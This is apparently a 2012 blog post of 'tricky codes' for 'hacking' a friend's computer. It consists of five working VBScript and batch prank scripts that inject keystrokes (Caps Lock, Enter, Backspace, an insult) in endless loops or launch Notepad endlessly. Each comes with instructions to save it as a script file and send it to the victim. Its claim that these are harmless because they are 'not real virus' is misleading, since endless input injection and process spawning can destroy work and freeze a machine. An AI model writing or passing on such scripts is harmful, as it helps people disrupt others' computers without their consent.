22 January, 2012

Tricky Codes For Hacking Your friends Computer

Tricky Codes For Hacking Your friends Computer


THESE R FOR LEARNING PURPOSES NOT FOR MISUSE(WELL U CANT MISUSE AS THEY R NOT REAL VIRUS )

Toggle your friend's Caps Lock button simultaneously:

Code:

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop

Save it as "Anything.VBS" and send it.

Frustrate your friend by making this VBScript hit Enter simultaneously:

Type :

Code:
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop

Save it as "Anything.VBS" and send it.

Hack your friend's keyboard and make him type "You are a fool" simultaneously:
Type :

Code:
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "You are a fool."
loop

Save it as "Anything.VBS" and send it.

Open Notepad continually in your friend's computer:
Type :

Code:
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

Save it as "Anything.BAT" and send it.

Frustrate your friend by making this VBScript hit Backspace simultaneously:
Type :

Code:
MsgBox "Let's go back a few steps"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop
Save it as "Anything.VBS" and send it

Enjoy...

No comments:

Post a Comment